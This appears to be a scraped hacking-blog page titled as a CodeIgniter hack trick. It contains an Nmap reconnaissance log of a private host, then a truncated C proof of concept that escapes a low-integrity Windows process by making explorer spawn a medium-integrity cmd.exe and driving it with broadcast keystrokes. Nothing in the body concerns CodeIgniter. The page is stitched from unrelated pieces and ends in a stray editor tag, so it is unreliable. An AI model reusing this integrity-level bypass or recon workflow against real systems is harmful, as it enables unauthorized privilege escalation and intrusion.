Taklukkan Sasaran Tanpa Menyentuhnya - Code Igniter Hack's Trick

Initiating ARP Ping Scan at 15:24 

Scanning 172.17.12.139 [1 port] 

Completed ARP Ping Scan at 15:24, 0.31s elapsed (1 total hosts) 

Initiating Parallel DNS resolution of 1 host. at 15:24 

Completed Parallel DNS resolution of 1 host. at 15:24, 16.50s elapsed 

Initiating SYN Stealth Scan at 15:24 

Scanning 172.17.12.139 [1000 ports] 

Discovered open port 443/tcp on 172.17.12.139 

Discovered open port 53/tcp on 172.17.12.139 

Discovered open port 8080/tcp on 172.17.12.139 

Discovered open port 80/tcp on 172.17.12.139 

Discovered open port 3128/tcp on 172.17.12.139 

Completed SYN Stealth Scan at 15:24, 4.83s elapsed (1000 total ports) 

Initiating Service scan at 15:24 

Scanning 5 services on 172.17.12.139 

Completed Service scan at 15:24, 12.38s elapsed (5 services on 1 host) 

Initiating OS detection (try #1) against 172.17.12.139 

Retrying OS detection (try #2) against 172.17.12.139 

NSE: Script scanning 172.17.12.139. 

Initiating NSE at 15:24 

Completed NSE at 15:25, 18.73s elapsed 

Nmap scan report for 172.17.12.139 

Host is up (0.00014s latency). 

Not shown: 995 filtered ports 

PORT STATE SERVICE VERSION 

53/tcp open domain? 

80/tcp open http Apache httpd 2.2.21 ((Win32) mod_ssl/2.2.21 OpenSSL/1.0.0e PHP/5.3.8 mod_perl/2.0.4 Perl/v5.10.1) 

|_http-favicon: Unknown favicon MD5: 3BD2EC61324AD4D27CB7B0F484CD4289 

| http-methods: GET HEAD POST OPTIONS TRACE 

| Potentially risky methods: TRACE 

|_See http://nmap.org/nsedoc/scripts/http-methods.html 

|_http-title: Index of / 

443/tcp open ssl/http Apache httpd 2.2.21 ((Win32) mod_ssl/2.2.21 OpenSSL/1.0.0e PHP/5.3.8 mod_perl/2.0.4 Perl/v5.10.1) 

|_http-favicon: Unknown favicon MD5: 3BD2EC61324AD4D27CB7B0F484CD4289 

| http-methods: GET HEAD POST OPTIONS TRACE 

| Potentially risky methods: TRACE 

|_See http://nmap.org/nsedoc/scripts/http-methods.html 

|_http-title: Index of / 

| ssl-cert: Subject: commonName=localhost 

| Issuer: commonName=localhost 

| Public Key type: rsa 

| Public Key bits: 1024 

| Not valid before: 2009-11-10T23:48:47+00:00 

| Not valid after: 2019-11-08T23:48:47+00:00 

| MD5: a0a4 4cc9 9e84 b26f 9e63 9f9e d229 dee0 

|_SHA-1: b023 8c54 7a90 5bfa 119c 4e8b acca eacf 3649 1ff6 

|_ssl-date: 2014-01-16T08:24:52+00:00; 0s from local time. 

| sslv2: 

| SSLv2 supported 

| ciphers: 

| SSL2_DES_192_EDE3_CBC_WITH_MD5 

| SSL2_IDEA_128_CBC_WITH_MD5 

| SSL2_RC2_CBC_128_CBC_WITH_MD5 

| SSL2_RC4_128_WITH_MD5 

| SSL2_DES_64_CBC_WITH_MD5 

| SSL2_RC2_CBC_128_CBC_WITH_MD5 

|_ SSL2_RC4_128_EXPORT40_WITH_MD5 

3128/tcp open squid-http? 

|_http-open-proxy: ERROR: Script execution failed (use -d to debug) 

8080/tcp open http-proxy? 

|_http-open-proxy: ERROR: Script execution failed (use -d to debug) 

MAC Address: 00:0C:42:BE:02:9D (Routerboard.com) 

Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port 

Aggressive OS guesses: Linux 2.6.32 (94%), Linux 2.6.19 - 2.6.36 (92%), Linux 2.6.31 - 2.6.35 (92%), Check Point VPN-1 UTM appliance (91%), Infoblox Trinzic network control appliance (90%), Linux 2.6.32 - 2.6.35 (90%), Android 3 (Linux 2.6.36) (89%), Linux 2.6.32 - 3.9 (89%), HP P2000 G3 NAS device (88%), Linux 2.6.17 - 2.6.36 (88%) 

No exact OS matches for host (test conditions non-ideal). 

Network Distance: 1 hop 

TRACEROUTE 

HOP RTT ADDRESS 

1 0.14 ms 172.17.12.139 

NSE: Script Post-scanning. 

Read data files from: C:\Program Files\Nmap 

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ . 

Nmap done: 1 IP address (1 host up) scanned in 61.65 seconds 

Raw packets sent: 2049 (93.464KB) | Rcvd: 54 (5.948KB) 

{

STARTUPINFO si = {0};

PROCESS_INFORMATION pi = {0};

PCHAR payload[] = {

"echo \".___ _____ ______________ ______________ \"> %USERPROFILE%\\Desktop\\TROLOLOL",

"echo \"| | / \\ \\__ ___/ | \\_ _____/ \">> %USERPROFILE%\\Desktop\\TROLOLOL",

"echo \"| |/ \\ / \\ | | / ~ \\ __)_ \">> %USERPROFILE%\\Desktop\\TROLOLOL",

"echo \"| / Y \\ | | \\ Y / \\ \">> %USERPROFILE%\\Desktop\\TROLOLOL",

"echo \"|___\\____|__ / |____| \\___|_ /_______ / \">> %USERPROFILE%\\Desktop\\TROLOLOL",

"echo \" \\/ \\/ \\/ \">> %USERPROFILE%\\Desktop\\TROLOLOL",

"echo \" _______ .___ ________ ________ _____ \">> %USERPROFILE%\\Desktop\\TROLOLOL",

"echo \" \\ \\ | |/ _____/ / _____/ / _ \\ \">> %USERPROFILE%\\Desktop\\TROLOLOL",

"echo \" / | \\| / \\ ___/ \\ ___ / /_\\ \\ \">> %USERPROFILE%\\Desktop\\TROLOLOL",

"echo \"/ | \\ \\ \\_\\ \\ \\_\\ \\/ | \\ \">> %USERPROFILE%\\Desktop\\TROLOLOL",

"echo \"\\____|__ /___|\\______ /\\______ /\\____|__ / \">> %USERPROFILE%\\Desktop\\TROLOLOL",

"echo \" \\/ \\/ \\/ \\/ \">> %USERPROFILE%\\Desktop\\TROLOLOL",

"exit",

NULL

};

printf("1] Spawning a low IL cmd.exe (from a low IL process)..Rdy ? Press to continue\n");

getchar();

si.cb = sizeof(si); 

CreateProcess(

NULL,

"cmd.exe",

NULL,

NULL,

TRUE,

CREATE_NEW_CONSOLE,

NULL,

NULL,

&si,

&pi

);

Sleep(1000);

// Yeah, you can "bruteforce" the index of the window..

printf("2] Use Win+Shift+7 to ask explorer.exe to spawn a cmd.exe MI..");

keybd_event(VK_LWIN, 0x5B, 0, 0);

keybd_event(VK_LSHIFT, 0xAA, 0, 0);

keybd_event(0x37, 0x87, 0, 0);

keybd_event(VK_LWIN, 0x5B, KEYEVENTF_KEYUP, 0);

keybd_event(VK_LSHIFT, 0xAA, KEYEVENTF_KEYUP, 0);

keybd_event(0x37, 0x87, KEYEVENTF_KEYUP, 0);

Sleep(1000);

printf("3] Killing now the useless low IL cmd.exe..\n");

TerminateProcess(

pi.hProcess,

1337

);

printf("4] Now driving the medium IL cmd.exe with SendMessage and HWND_BROADCAST (WM_CHAR)\n");

printf(" \"Drive the command prompt [..] to make it look like a scene from a Hollywood movie.\" <- That's what we're going to do!\n");

for(unsigned int i = 0; payload[i] != NULL; ++i)

{

for(unsigned int j = 0; j < strlen(payload[i]); ++j)

{

// Yeah, that's the fun part to watch ;D

Sleep(10);

SendMessage(

HWND_BROADCAST,

WM_CHAR,

payload[i][j],

0

);

}

SendMessage(

HWND_BROADCAST,

WM_CHAR,

VK_RETURN,

0

);

}

return EXIT_SUCCESS;

}

</NppFTP>